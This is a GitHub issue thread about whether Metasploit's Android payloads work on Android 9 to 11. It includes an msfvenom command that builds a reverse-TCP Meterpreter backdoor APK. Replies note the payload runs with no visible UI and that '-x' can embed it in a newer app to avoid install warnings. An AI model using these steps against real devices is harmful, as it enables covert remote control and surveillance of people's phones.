### ISSUE TITLE
Does it work for android 9, 10 and 11?

### ISSUE THREAD

**Issue by D4RKH0R1Z0N** [rapid7/metasploit-framework#15777]
Does the metasploit framework work from android 9, 10 and 11?
When I create a payload
  `msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT="8080 R > backdoor.apk`
and install it on my android 10 device it shows
  `This app was made for older version of android`
Please make it support new android version like 10 and 11
and also till which version does metasploit support android version till now?

**Comment by timwr** [comment]
Hi @D4RKH0R1Z0N 
- Android 10 is supported, but there is a warning shown (`This app was made for an older version of android`) when you first install the default application. You can safely ignore this warning.
- The default application has no UI so you won't notice anything on the device when it runs.
- You need to set the correct LHOST value. 0.0.0.0 is incorrect. You must set the correct handler ip address in both msfvenom and on the handler itself.

**Comment by vic131** [comment]
> Hi @D4RKH0R1Z0N
> 
>     * Android 10 is supported, but there is a warning shown (`This app was made for an older version of android`) when you first install the default application. You can safely ignore this warning.
> 
>     * The default application has no UI so you won't notice anything on the device when it runs.
> 
>     * You need to set the correct LHOST value. 0.0.0.0 is incorrect. You must set the correct handler ip address in both msfvenom and on the handler itself.

What if you dont want the message to show up ? Is possible to recompile with apktool changing the android version, so there wont be any warning to be ignored ?

**Comment by vic131** [comment]
@timwr 
What if you dont want the message to show up ? Is possible to recompile with apktool changing the android version, so there wont be any warning to be ignored ?

**Comment by timwr** [comment]
@vic131 using msfvenom -x with an apk built for a recent version of Android should suppress this warning?
